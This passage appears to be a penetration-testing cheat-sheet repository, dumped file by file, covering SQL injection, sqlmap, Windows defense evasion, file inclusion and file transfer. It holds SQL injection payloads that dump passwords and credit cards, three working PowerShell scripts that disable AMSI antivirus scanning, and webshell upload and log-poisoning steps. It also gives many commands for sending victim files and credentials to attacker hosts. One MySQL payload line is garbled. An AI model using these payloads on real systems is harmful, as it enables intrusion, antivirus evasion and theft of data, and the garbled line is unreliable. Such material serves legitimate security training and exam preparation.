example: psql -h localhost -d clients -U tyrone -W

--------------------------------------------------------------------------------
/databases/sql/sqli.txt:
--------------------------------------------------------------------------------
SQL Injection attack steps (start from -> http://vulnsite.com/clients.php?id=150):

# Important note! For SQL injection comments (--) to work, you need to include a space at the end (-- ) or (-- -)

Step 1: id=150' -> if the sql error is not visible, you need to do blind SQL injection

Step 2: id=150 order by 1-- -
# Try to use ;# at the end to comment out the next query
# Increment the order number until you hit an error to find out how many columns there are
# Say you get an error at 'id=150 order by 9-- -' -> this means there are 8 columns available

Step 3: id=150 union select 1,2,3,4,5,6,7,8
# See what column numbers appear on the website somewhere, those are the ones whose output you can read
# Say we only see column 3, 5 and 8 on the screen

Step 4: id=150 union all select 1,2,user(),4,@@version,6,7,8

Step 5: id=150 union all select 1,2,3,4,table_name,6,7,8 FROM information_schema.tables
# extract all tablenames
# information_schema exists on MySQL, SQL Server and PostgreSQL; Oracle (all_tables) and SQLite (sqlite_master) use different catalogs

Step 6: id=150 union all select 1,2,3,4,5,6,7,column_name FROM information_schema.columns where table_name='<table>'
# Say we find table 'clients' with columns 'name', 'password', 'credit_card', 'not_important'

Step 7: id=150 union select 1,2,name,4,password,6,7,credit_card FROM clients
# This will dump all the data on the website for us to see
# (if it's a stored SQL injection, anyone who browses to that page will see the data dump)


Sql injection queries:

Test for vulnerable columns (sometimes you need to limit to 1 result and supply a negative index so the original row is empty and we can properly see our output):

syntax : http://vulnerable.org/items?id=-1 union all select <column numbers> LIMIT 1-- -
example: http://vulnerable.org/items?id=-1 union all select 1,2,3,4,5,6,7 LIMIT 1-- -


Load a file's contents if the FILE privilege is enabled (MySQL):

syntax : id=150 union all select 1,2,3,4,5,6,7,load_file("<path>")
example: id=150 union all select 1,2,3,4,5,6,7,load_file("c:\\Users\\Derrick\\Desktop\\password.txt") # backslashes must be doubled inside a MySQL string, "c:\Users" would become "c:Users"


Write a file to the remote server if the FILE privilege is enabled and the target directory is writable by the database user (MySQL):

syntax : id=150 union all select 1,2,3,4,"<file contents>",6,7,8 into outfile '<path>'
example: id=150 union all select 1,2,3,4,"<php webshell code>",6,7,8 into outfile '/var/www/html/upload.php'


Useful queries per database version:

MYSQL:
Blind SQL Injection:
# time-based
syntax : ' AND (SELECT CASE WHEN ((SELECT hex(substr(<column>,<position>,1)) FROM <table> LIMIT <row>,1) = hex('<character>')) THEN sleep(
LIMIT <row>,1) = hex('<character>')) THEN 1 ELSE 0 END));-- -
example: ' AND (SELECT CASE WHEN ((SELECT hex(substr(table_name,1,1)) FROM information_schema.tables LIMIT 0,1) = hex('a')) THEN 1 ELSE 0 END));-- -

MSSQL:
Blind SQL Injection:
# error-based: enumerate readable databases (converting a string to a number fails and the error message leaks the value)
syntax : or 1 in (SELECT TOP 1 CAST(db_name(<n>) as varchar(4096)));-- -
example: or 1 in (SELECT TOP 1 CAST(db_name(1) as varchar(4096)));-- -

# error-based: enumerate database tables (add each name found to the NOT IN list to get the next one)
syntax : or 1 in (SELECT TOP 1 CAST(<column> as varchar(4096)) FROM <database>..<table> WHERE xtype='U' and <column> NOT IN (<already found>)); -- -
example: or 1 in (SELECT TOP 1 CAST(name as varchar(4096)) FROM master..sysobjects WHERE xtype='U' and name NOT IN ('users', 'employees')); -- -

# error-based: enumerate table columns
syntax : or 1 in (SELECT TOP 1 CAST (<db>..syscolumns.name as varchar(4096)) FROM <db>..syscolumns, <db>..sysobjects WHERE <db>..syscolumns.id=<db>..sysobjects.id
         AND <db>..sysobjects.name='<table>' AND <db>..syscolumns.name NOT IN (<already found>)); -- -
example: or 1 in (SELECT TOP 1 CAST (cms..syscolumns.name as varchar(4096)) FROM cms..syscolumns, cms..sysobjects WHERE cms..syscolumns.id=cms..sysobjects.id
         AND cms..sysobjects.name='cms_users' AND cms..syscolumns.name NOT IN ('id', 'username', 'address')); -- -

# error-based: extract column data
syntax : or 1 in (SELECT TOP 1 CAST (<column> as varchar(4096)) FROM <db>..<table> WHERE <column> NOT IN (<already found>)); -- -
example: or 1 in (SELECT TOP 1 CAST (password as varchar(4096)) FROM cms..cms_users WHERE password NOT IN ('P@ssw0rD!', 'Sup3rS3cur3!', 'Summer2020')); -- -

# for more: https://perspectiverisk.com/mssql-practical-injection-cheat-sheet/


SQLITE:
Blind SQL Injection:
# boolean-based
syntax : " AND (SELECT CASE WHEN ((SELECT hex(substr(<column>,<position>,1)) FROM <table> LIMIT <row>,1) = hex('<character>')) then match(1,1) END))-- -
example: " AND (SELECT CASE WHEN ((SELECT hex(substr(name,1,1)) FROM sqlite_master LIMIT 0,1) = hex('a')) then match(1,1) END))-- -
--------------------------------------------------------------------------------
/databases/sql/sqlmap.txt:
--------------------------------------------------------------------------------
Sqlmap is an sql injection automation tool, capable of finding and exploiting sql injections (NOT allowed on the OSCP exam)

Find sql injection vulnerabilities via url parameter:
syntax : sqlmap -u <url>
example: sqlmap -u http://vulnsite.com/clients.php?id=150

Sql injection exploits via url parameter (--dbms tells sqlmap which backend to assume; -D <name> selects a database to dump, it is not an alias for --dbms):
syntax : sqlmap -u <url> --dbms=<dbms> --dump --threads=5
example: sqlmap -u http://vulnsite.com/clients.php?id=150 --dbms=mssql --dump --threads=5
example: sqlmap -u http://vulnsite.com/clients.php?id=150 --dbms=mysql --os-shell

Sql injection on a login form with POST data:
syntax : sqlmap -u <url> --data="<post data>"
example: sqlmap -u http://www.vulnserver.com/login.php --data="username=admin&password=admin" --dump

Sql injection on a login form with POST data via Burp request:
Step 1 : make the POST request in burp and send to repeater
Step 2 : in repeater tab, right click the content screen and copy to file -> <request file>
Step 3 : sqlmap -r <request file>

Upload a file via sqlmap:
syntax : sqlmap -u <url> --data="<post data>" --file-write=<local file> --file-dest=<remote path>
example: sqlmap -u http://10.10.10.167/view_product.php --data="productId=32" --file-write=./bobeye.php --file-dest=c:\inetpub\wwwroot\bobeye.php
--------------------------------------------------------------------------------
/defense_evasion/amsi/AmsiInitFailed.ps1:
--------------------------------------------------------------------------------
# Powershell script to set AmsiInitFailed to true to disable AMSI
# DO NOT COPY-PASTE HERE, THE COMMENTS WILL TRIGGER AV DUE TO AMSIUTILS BEING MENTIONED

$niks = $null 5 | $waar = $true 6 | 7 | # loop through all assembly types to get the AmsiUtils class 8 | $a=[Ref].Assembly.GetTypes() 9 | Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}} 10 | 11 | # loop through all non-public, static attributes in the AmsiUtils class and grab the AmsiInitFailed field 12 | $d=$c.GetFields('NonPublic,Static') 13 | Foreach($e in $d) {if ($e.Name -like "*itFailed") {$f=$e}} 14 | 15 | # set the AmsiInitFailed field to true 16 | $f.SetValue($niks, $waar) 17 | 18 | 19 | ### COPY-PASTE HERE 20 | 21 | $niks = $null 22 | $waar = $true 23 | 24 | $a=[Ref].Assembly.GetTypes() 25 | Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}} 26 | 27 | $d=$c.GetFields('NonPublic,Static') 28 | Foreach($e in $d) {if ($e.Name -like "*itFailed") {$f=$e}} 29 | 30 | $f.SetValue($niks, $waar) 31 | -------------------------------------------------------------------------------- /defense_evasion/amsi/AmsiPatchInMemory.ps1: -------------------------------------------------------------------------------- 1 | # Patch AMSI's AmsiOpenSession function in-memory using the Win32 API. 2 | # We resolve the functions from kernel32 dynamically in Powershell to prevent dropping temporary files to disk via .NET assembly loading, for example 3 | 4 | # function to dynamically lookup functions in system dll's at runtime 5 | function LookupFunc { 6 | Param ($moduleName, $functionName) 7 | $assem = ([AppDomain]::CurrentDomain.GetAssemblies() | 8 | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1]. 
9 | Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods') 10 | $tmp=@() 11 | $assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}} 12 | return $tmp[0].Invoke($null, @(($assem.GetMethod('GetModuleHandle')).Invoke($null, @($moduleName)), $functionName)) 13 | } 14 | 15 | # function to create delegate types for Win32 API functions 16 | function getDelegateType { 17 | Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $func,[Parameter(Position = 1)] [Type] $delType = [Void]) 18 | 19 | $type = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), 20 | [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false). 21 | DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]) 22 | 23 | $type.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $func). 
24 | SetImplementationFlags('Runtime, Managed') 25 | 26 | $type.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delType, $func).SetImplementationFlags('Runtime, Managed') 27 | return $type.CreateType() 28 | } 29 | 30 | [IntPtr]$funcAddr = LookupFunc amsi.dll AmsiOpenSession 31 | $oldProtectionBuffer = 0 32 | $vp=[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll VirtualProtect), 33 | (getDelegateType @([IntPtr], [UInt32], [UInt32], [UInt32].MakeByRefType()) ([Bool]))) 34 | $vp.Invoke($funcAddr, 3, 0x40, [ref]$oldProtectionBuffer) 35 | $buf = [Byte[]] (0x48, 0x31, 0xC0) 36 | [System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $funcAddr, 3) 37 | $vp.Invoke($funcAddr, 3, 0x20, [ref]$oldProtectionBuffer) 38 | -------------------------------------------------------------------------------- /defense_evasion/amsi/OverwriteAmsiContext.ps1: -------------------------------------------------------------------------------- 1 | # Powershell script to overwrite AmsiContext with null bytes to force AMSI to throw errors 2 | # DO NOT COPY-PASTE HERE, THE COMMENTS WILL TRIGGER AV DUE TO AMSIUTILS BEING MENTIONED 3 | 4 | # loop through all assembly types to get the AmsiUtils class 5 | $a=[Ref].Assembly.GetTypes() 6 | Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}} 7 | 8 | # loop through all non-public, static attributes in the AmsiUtils class and grab AmsiContext 9 | $d=$c.GetFields('NonPublic,Static') 10 | Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}} 11 | 12 | # get address of AmsiContext, convert it to hex and overwrite it with 0 13 | $g=$f.GetValue($null) 14 | [IntPtr]$ptr=$g 15 | [Int32[]]$buf=@(0) 16 | [System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1) 17 | 18 | 19 | ### COPY-PASTE HERE 20 | 21 | $a=[Ref].Assembly.GetTypes() 22 | Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}} 23 | 24 | $d=$c.GetFields('NonPublic,Static') 25 | Foreach($e in $d) {if ($e.Name -like 
"*Context") {$f=$e}} 26 | 27 | $g=$f.GetValue($null) 28 | [IntPtr]$ptr=$g 29 | [Int32[]]$buf=@(0) 30 | [System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1) 31 | -------------------------------------------------------------------------------- /development/cross-compile.txt: -------------------------------------------------------------------------------- 1 | Install cross-compiler: apt-get install mingw-w64 2 | 3 | Cross-compile source code from linux to windows 32-bit: 4 | 5 | syntax : /usr/bin/i686-w64-mingw32-gcc -o 6 | example: /usr/bin/i686-w64-mingw32-gcc vuln.c -o vuln.exe 7 | 8 | 9 | Cross-compile source code from linux to windows 64-bit: 10 | 11 | syntax : x86_64-w64-mingw32-gcc -o 12 | example: x86_64-w64-mingw32-gcc shell.c -o shell.exe 13 | 14 | 15 | Compile a C/C++ file for 32-bit: 16 | 17 | syntax : gcc -o -m32 18 | example: gcc kernelExploit.c -o kernelExploit -m32 19 | -------------------------------------------------------------------------------- /development/nasm.txt: -------------------------------------------------------------------------------- 1 | Use nasm to compile Assembly programs: 2 | 3 | Compile x86 Assembly for Linux: 4 | Step 1: nasm -f elf32 .asm -o .o 5 | Step 2: ld -m elf_i386 .o -o 6 | Optional: 7 | Step 2: gcc -m32 .o -o 8 | # use this if you're using external functions from C (use `global main`, instead of `global _start`) 9 | 10 | Compile x86_64 Assembly for Linux: 11 | Step 1: nasm -f elf64 .asm -o .o 12 | Step 2: ld -m elf_x86_64 .o -o 13 | Optional: 14 | Step 2: gcc .o -o 15 | # use this if you're using external functions from C (use `global main`, instead of `global _start`) 16 | 17 | -------------------------------------------------------------------------------- /file_inclusion/lfi.txt: -------------------------------------------------------------------------------- 1 | Use php local file inclusion + log poisoning to get remote command execution: 2 | 3 | Step 1(host): 4 | syntax : nc -nv 5 | example: nc -nv 
10.23.12.32 80 6 | 7 | Step 2(host): 8 | # Entering this over a netcat session might log it into the target's log files, 9 | allowing us to display and execute the php line via local file inclusion. 10 | 11 | Step 3(host): 12 | syntax : http://vulnsite.com/vuln.php?cmd=&language=../../../../../../ 13 | example: http://vulnsite.com/vuln.php?cmd=whoami&language=../../../../../../var/html/www/access.log 14 | # The logfiles might be in different locations, depending on the target system 15 | 16 | Php local file inclusion base64 method: 17 | 18 | example: http://vulnsite.com/?page=php://filter/convert.base64-encode/resource=config 19 | example: http://vulnsite.com/?page=php://filter/convert.base64-encode/resource=upload 20 | example: http://vulnsite.com/browse.php?lang=php://filter/convert.base64-encode/resource=index.php HTTP/1.1 21 | 22 | 23 | Php upload file bypass by embeddig php code into image/gif files: 24 | 25 | #'pikachu.gif' is a random gif I found on the internet, 'shell.php' is the file that contains the malicious php code 26 | 27 | GIF file with php code via gifsicle: 28 | 29 | syntax : gifsicle < .gif --comment '' > .php.gif 30 | example: gifsicle < pikachu.gif --comment "" > output.php.gif 31 | 32 | 33 | JPG file with php code via python: 34 | 35 | Step 1: python 36 | Step 2: aRandomName = open ('pikachu.gif','rb').read() 37 | Step 3: aRandomName += open ('shell.php','rb').read() 38 | Step 4: open ('newshell.php.jpg','wb').write(aRandomName) 39 | -------------------------------------------------------------------------------- /file_inclusion/uploadFile.txt: -------------------------------------------------------------------------------- 1 | Check 'Hackthebox: Bastard' and Ippsec's video on it (https://www.youtube.com/watch?v=lP-E5vmZNC0 @ 6:40) 2 | 3 | $phpCode = <<<'EOD' 4 | " . shell_exec($_REQUEST['fexec']) . 
""; 11 | }; 12 | ?> 13 | EOD; 14 | -------------------------------------------------------------------------------- /filetransfer/base64.txt: -------------------------------------------------------------------------------- 1 | Transfer files via base64: 2 | 3 | Linux: 4 | Step 1(victim): cat | base64 -w 0 | xclip ### xclip copies the output to your clipboard, so you can paste the base64. It's not always available, though. 5 | Step 2(host) : echo | base64 -d > file 6 | 7 | 8 | Windows (some are powershell-only): 9 | Step 1(victim): $fc = Get-Content 10 | Step 2(victim): $fe = [System.Text.Encoding]::UTF8.GetBytes($fc) # [System.Text.Encoding]::Unicode.GetBytes() 11 | Step 3(victim): [System.Convert]::ToBase64String($fe) 12 | 13 | 14 | Step 1(target): certutil -encode && findstr /v /c:- > 15 | Optional step 1(target): certutil -decode 16 | 17 | Example: 18 | certutil -encode data.txt tmp.b64 && findstr /v /c:- tmp.b64 > data.b64 19 | certutil -decode data.b64 data.txt 20 | -------------------------------------------------------------------------------- /filetransfer/dev_tcp.txt: -------------------------------------------------------------------------------- 1 | Example with a limited shell 2 | 3 | Step 1(host) : nc -lvnp < file.Txt 4 | Step 2(target): bash -c "cat < /dev/tcp// > ./file.txt" 5 | 6 | Don't use 'bash -c' if you have a working bash shell. 7 | -------------------------------------------------------------------------------- /filetransfer/ftp_commands.txt: -------------------------------------------------------------------------------- 1 | Transfer via ftp from a windows box: 2 | 3 | Step 1(attacker): sudo python -m pyftpdlib -p 21 ##or don't specify port and it uses 2121 4 | Step 2(victim) : echo the following commands into a file, then run that file with ftp 5 | 6 | ### Note that there's no spaces between the commands and the '>>' operator, this is required for the script to work! 
7 | echo "open ">>ftper 8 | echo "">>ftper ##anonymous 9 | echo "">>ftper ##anonymous (anything works) 10 | echo "passive">>ftper 11 | echo "binary">>ftper 12 | echo "get ">>ftper 13 | #echo "put ">>ftper 14 | echo "disconnect">>ftper 15 | #echo "quit">>ftper 16 | #echo "bye">>ftper 17 | 18 | ftp -v -s:ftper 19 | -------------------------------------------------------------------------------- /filetransfer/ftp_server.txt: -------------------------------------------------------------------------------- 1 | sudo python -m pyftpdlib -p 21 2 | -------------------------------------------------------------------------------- /filetransfer/http_server.txt: -------------------------------------------------------------------------------- 1 | Transfer files if python is on the box: 2 | 3 | Step 1(host) : python -m SimpleHTTPServer / python3 http.server 4 | Step 2(target): curl :/file > file 5 | 6 | Alternate step 2(host): wget http://:/filename # Go into /tmp if permission denied 7 | -------------------------------------------------------------------------------- /filetransfer/nc.txt: -------------------------------------------------------------------------------- 1 | Transfer files via nc: 2 | 3 | Linux: 4 | Transfer a file from attacker to victim: 5 | Step 1(victim) : nc -lvnp > 6 | Step 2(attacker): nc < 7 | 8 | Windows: 9 | Transfer a file from victim to attacker (upload nc.exe first or execute it through your smb server): 10 | Step 1(attacker): nc -lvnp > 11 | Step 2(victim) : type | .\nc.exe 12 | -------------------------------------------------------------------------------- /filetransfer/nginx_file_transfer.txt: -------------------------------------------------------------------------------- 1 | https://www.youtube.com/watch?v=7ifJOon5-G8 @ 15:00 #Ippsec Olympus htb 2 | 3 | Uploading files via nginx: 4 | 5 | Linux: 6 | syntax : curl --upload-file : 7 | example: curl --upload-file creds.txt 10.12.15.67:9090 8 | 9 | Windows powershell: 10 | Step 1(target) : $text = 
Get-Content .\ -Raw 11 | Optional step 1: $text = [IO.File]::ReadAllText(".\") 12 | 13 | syntax : powershell -c 'Invoke-RestMethod -Method -Uri "http://:/" -Body $' 14 | example: powershell -c 'Invoke-RestMethod -Method PUT -Uri "http://10.13.12.20:9090/file.txt" -Body $text' 15 | 16 | -------------------------------------------------------------------------------- /filetransfer/nginx_setup.txt: -------------------------------------------------------------------------------- 1 | https://www.youtube.com/watch?v=7ifJOon5-G8 @ 15:00 #Ippsec Olympus htb 2 | 3 | Setting up nginx for file uploads: 4 | 5 | Step 1(host): mkdir /var/www/upload 6 | Step 2(host): touch /etc/nginx/sites-available/file_upload 7 | Step 3(host): enter the following in 'file_upload': 8 | 9 | server { 10 | listen 9090 default_server; 11 | server_name hackerman.com; 12 | location / { 13 | root /var/www/upload; 14 | dav_methods PUT; 15 | } 16 | } 17 | 18 | 19 | Step 4(host): ln -s /etc/nginx/sites-available/file_upload /etc/nginx/sites-enabled/file_upload 20 | Step 5(host): systemctl nginx 21 | Step 6(host): chown www-data /var/www/upload/ 22 | Step 7(host): chmod 777 /var/www/upload/ 23 | -------------------------------------------------------------------------------- /filetransfer/rsync.txt: -------------------------------------------------------------------------------- 1 | Transfer files from and to an rsync server: 2 | https://www.tecmint.com/rsync-local-remote-file-synchronization-commands/ 3 | 4 | flags: -v = verbose -r = copy data recursively -a = copy data recursively and preserve symbolic links, file permissions, user & group ownerships... 
5 | -z = compress file data -h = human-readable format 6 | 7 | 8 | Transfer files on a local machine: 9 | 10 | syntax : rsync 11 | example: rsync ./passwords.tar /tmp/passwords/ 12 | 13 | Transfer files from a local machine to a remote rsync server: 14 | 15 | syntax : rsync @: 16 | example: rsync ./passwords/ randy@10.10.23.11:/home/randy/ 17 | 18 | Transfer files from a remote rsync server to a local machine: 19 | 20 | syntax : rsync @: 21 | example: rsync randy@10.10.23.11/home/randy/passwords /tmp/passwords 22 | -------------------------------------------------------------------------------- /filetransfer/scp.txt: -------------------------------------------------------------------------------- 1 | SCP is a file-transfer method that works via ssh. 2 | 3 | Transfer local files to remote machine: 4 | syntax : scp @: 5 | example: scp file.bak admin@192.168.84.34:/home/admin 6 | 7 | Transfer remote files to local machine: 8 | syntax : scp @: 9 | example: scp root@10.13.13.38:/root/capture.pcap ./ 10 | -------------------------------------------------------------------------------- /filetransfer/smb.txt: -------------------------------------------------------------------------------- 1 | Transfer files via smb: 2 | 3 | Step 1(attacker) : sudo python /opt/smbserver.py ### sudo python /opt/smbserver.py 10.10.x.x TEST /root/Desktop 4 | Optional(attacker): smbclient -L --no-pass ### check connection 5 | Optional(victim) : net view \\ 6 | Step 2(victim) : copy \\\\file.exe ./ 7 | 8 | 9 | OR Windows: 10 | 11 | Step 1(attacker): sudo impacket-smbserver ./ # sudo impacket-smbserver -smb2support files ./ 12 | Step 2(victim) : powershell -nop -c 'xcopy \\\\ C:\\Users\\AppData\Local\Temp\' 13 | Alternate step 2(victim): copy \\\\ ./ 14 | -------------------------------------------------------------------------------- /filetransfer/smb_server.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # SECUREAUTH LABS. 
Copyright 2018 SecureAuth Corporation. All rights reserved. 3 | # 4 | # This software is provided under under a slightly modified version 5 | # of the Apache Software License. See the accompanying LICENSE file 6 | # for more information. 7 | # 8 | # Simple SMB Server example. 9 | # 10 | # Author: 11 | # Alberto Solino (@agsolino) 12 | # 13 | 14 | import sys 15 | import argparse 16 | import logging 17 | 18 | from impacket.examples import logger 19 | from impacket import smbserver, version 20 | from impacket.ntlm import compute_lmhash, compute_nthash 21 | 22 | if __name__ == '__main__': 23 | 24 | # Init the example's logger theme 25 | logger.init() 26 | print version.BANNER 27 | 28 | parser = argparse.ArgumentParser(add_help = True, description = "This script will launch a SMB Server and add a " 29 | "share specified as an argument. You need to be root in order to bind to port 445. " 30 | "No authentication will be enforced. Example: smbserver.py -comment 'My share' TMP " 31 | "/tmp") 32 | 33 | parser.add_argument('shareName', action='store', help='name of the share to add') 34 | parser.add_argument('sharePath', action='store', help='path of the share to add') 35 | parser.add_argument('-comment', action='store', help='share\'s comment to display when asked for shares') 36 | parser.add_argument('-username', action="store", help='Username to authenticate clients') 37 | parser.add_argument('-password', action="store", help='Password for the Username') 38 | parser.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes for the Username, format is LMHASH:NTHASH') 39 | parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON') 40 | parser.add_argument('-ip', '--interface-address', action='store', default='0.0.0.0', help='ip address of listening interface') 41 | parser.add_argument('-port', action='store', default='445', help='TCP port for listening incoming connections (default 445)') 42 | 
parser.add_argument('-smb2support', action='store_true', default=False, help='SMB2 Support (experimental!)') 43 | 44 | if len(sys.argv)==1: 45 | parser.print_help() 46 | sys.exit(1) 47 | 48 | try: 49 | options = parser.parse_args() 50 | except Exception, e: 51 | logging.critical(str(e)) 52 | sys.exit(1) 53 | 54 | if options.debug is True: 55 | logging.getLogger().setLevel(logging.DEBUG) 56 | else: 57 | logging.getLogger().setLevel(logging.INFO) 58 | 59 | if options.comment is None: 60 | comment = '' 61 | else: 62 | comment = options.comment 63 | 64 | server = smbserver.SimpleSMBServer(listenAddress=options.interface_address, listenPort=int(options.port)) 65 | 66 | server.addShare(options.shareName.upper(), options.sharePath, comment) 67 | server.setSMB2Support(options.smb2support) 68 | 69 | # If a user was specified, let's add it to the credentials for the SMBServer. If no user is specified, anonymous 70 | # connections will be allowed 71 | if options.username is not None: 72 | # we either need a password or hashes, if not, ask 73 | if options.password is None and options.hashes is None: 74 | from getpass import getpass 75 | password = getpass("Password:") 76 | # Let's convert to hashes 77 | lmhash = compute_lmhash(password) 78 | nthash = compute_nthash(password) 79 | elif options.password is not None: 80 | lmhash = compute_lmhash(options.password) 81 | nthash = compute_nthash(options.password) 82 | else: 83 | lmhash, nthash = options.hashes.split(':') 84 | 85 | server.addCredential(options.username, 0, lmhash, nthash) 86 | 87 | # Here you can set a custom SMB challenge in hex format 88 | # If empty defaults to '4141414141414141' 89 | # (remember: must be 16 hex bytes long) 90 | # e.g. 
server.setSMBChallenge('12345678abcdef00') 91 | server.setSMBChallenge('') 92 | 93 | # If you don't want log to stdout, comment the following line 94 | # If you want log dumped to a file, enter the filename 95 | server.setLogFile('') 96 | 97 | # Rock and roll 98 | server.start() 99 | -------------------------------------------------------------------------------- /filetransfer/windows/tftp.txt: -------------------------------------------------------------------------------- 1 | Transfer files via tftp, which is quite old, but can still be available: 2 | 3 | Step 1(host) : atftpd --daemon --port 69 #Specify which directory will be open to transactions 4 | Step 2(victim): tftp -i 5 | 6 | Example: tftp -i 192.168.0.124 GET remoteFile.txt 7 | Example: tftp -i 192.168.0.124 PUT localFile.txt 8 | -------------------------------------------------------------------------------- /filetransfer/windows/vbs.txt: -------------------------------------------------------------------------------- 1 | Transfer files to windows via a vbs script: 2 | 3 | Step 1(victim): Execute following script on the target machine 4 | 5 | echo strUrl = WScript.Arguments.Item(0) > wget.vbs 6 | echo StrFile = WScript.Arguments.Item(1) >> wget.vbs 7 | echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs 8 | echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs 9 | echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs 10 | echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs 11 | echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs 12 | echo Err.Clear >> wget.vbs 13 | echo Set http = Nothing >> wget.vbs 14 | echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs 15 | echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs 16 | echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs 17 | echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> 
wget.vbs 18 | echo http.Open "GET", strURL, False >> wget.vbs 19 | echo http.Send >> wget.vbs 20 | echo varByteArray = http.ResponseBody >> wget.vbs 21 | echo Set http = Nothing >> wget.vbs 22 | echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs 23 | echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs 24 | echo strData = "" >> wget.vbs 25 | echo strBuffer = "" >> wget.vbs 26 | echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs 27 | echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs 28 | echo Next >> wget.vbs 29 | echo ts.Close >> wget.vbs 30 | 31 | Step 2(host) : open http server 32 | Step 3(victim): 33 | 34 | syntax : cscript wget.vbs http://:/ 35 | example: cscript wget.vbs http://192.168.0.213:8000/vuln.exe vuln.exe 36 | -------------------------------------------------------------------------------- /filetransfer/windows/web_request.txt: -------------------------------------------------------------------------------- 1 | Transfer files via http with powershell: 2 | example: (New-Object System.Net.WebClient).DownloadFile('http://:/','C:\Users\\Desktop\') 3 | 4 | Transfer files with cmd.exe certutil (WILL GET CAUGHT BY ANTIVIRUS): 5 | Step 2(victim): certutil -urlcache -split -f http://:/ C:\\Users\\\\Downloads\\ 6 | -------------------------------------------------------------------------------- /filetransfer/windows/webrequest.txt: -------------------------------------------------------------------------------- 1 | Download a file from victim to attacker host via powershell webrequest: 2 | 3 | Step 1(host) : python -m SimpleHTTPServer 4 | Step 2(target): $url = "http://:/" 5 | Step 3(target): $output = "" 6 | Step 3(target): Invoke-WebRequest -Uri $url -OutFile $output 7 | -------------------------------------------------------------------------------- /filetransfer/windows/wget.txt: -------------------------------------------------------------------------------- 1 | Use Powershell wget to 
transfer files to Windows 2 | 3 | Step 1(host): download 'wget.exe' from the internet 4 | Step 1(host): open http server where the binary is located 5 | Step 3(host): transfer the 'wget.exe' to the victim box 6 | 7 | Step 4(victim): 8 | syntax : wget.exe http://:/ 9 | example: wget.exe http://192.168.0.145:8000/vuln.exe 10 | -------------------------------------------------------------------------------- /filetransfer/windows/winrm.txt: -------------------------------------------------------------------------------- 1 | Download and upload files via winrm: 2 | 3 | Step 1: Connect to the windows box via winrm 4 | # evil-winrm -i -u -p 5 | 6 | Download: While in the evil-winrm shell, download files from the victim box (Windows) to the attacker box (Kali Linux) 7 | syntax : download 8 | example: download C:\Users\Administrator\Documents\secrets.txt /home/hackerman/loot/secrets.txt 9 | 10 | Upload: While in the evil-winrm shell, upload files from the attacker box (Kali Linux) to the victim box (Windows) 11 | syntax : upload 12 | example: upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe C:\Windows\Temp\mimikatz.exe 13 | -------------------------------------------------------------------------------- /forensics/convert.txt: -------------------------------------------------------------------------------- 1 | Convert a raw screen dump to a png file: 2 | 3 | Step 1(victim) : cat /sys/class/graphics/fb0/virtual_size # get virtual size dimensions of data (1176, 885 in this case) 4 | Step 2(attacker): ./iraw2png.pl 1176 885 < screen.raw > screen.png # check 'Scripts' folder for the perl script 5 | 6 | -------------------------------------------------------------------------------- /forensics/dit.txt: -------------------------------------------------------------------------------- 1 | When you have a .dit file, follow this guide: https://blog.ropnop.com/extracting-hashes-and-domain-info-from-ntds-dit/ 2 | 
--------------------------------------------------------------------------------
/forensics/luks_encrypted.txt:
--------------------------------------------------------------------------------
Mount LUKS encrypted file (https://askubuntu.com/questions/835525/how-to-mount-luks-encrypted-file/835532#835532):

Step 1: modprobe dm-crypt # Make sure the 'dm-crypt' kernel module is loaded
Step 2: cryptsetup open --type luks /path/to/
Step 3: mount /dev/mapper/ /mnt

Bruteforce LUKS password (https://articles.forensicfocus.com/2018/02/22/bruteforcing-linux-full-disk-encryption-luks-with-hashcat/):

Step 1: dd if= of=.dd bs=512 count=4079
Step 2: hashcat -m 14600 -a 0 -w 3 --force


Dump LUKS file info:

example: cryptsetup luksDump


Extract hashes from LUKS file from RAM memory (https://0x00sec.org/t/breaking-encryption-hashed-passwords-luks-devices/811):

Step 1: get LiME (https://github.com/504ensicsLabs/LiME)
Step 2:
--------------------------------------------------------------------------------
/forensics/volatility.txt:
--------------------------------------------------------------------------------
Use volatility to scan memory dumps

Step 1:
syntax : volatility -f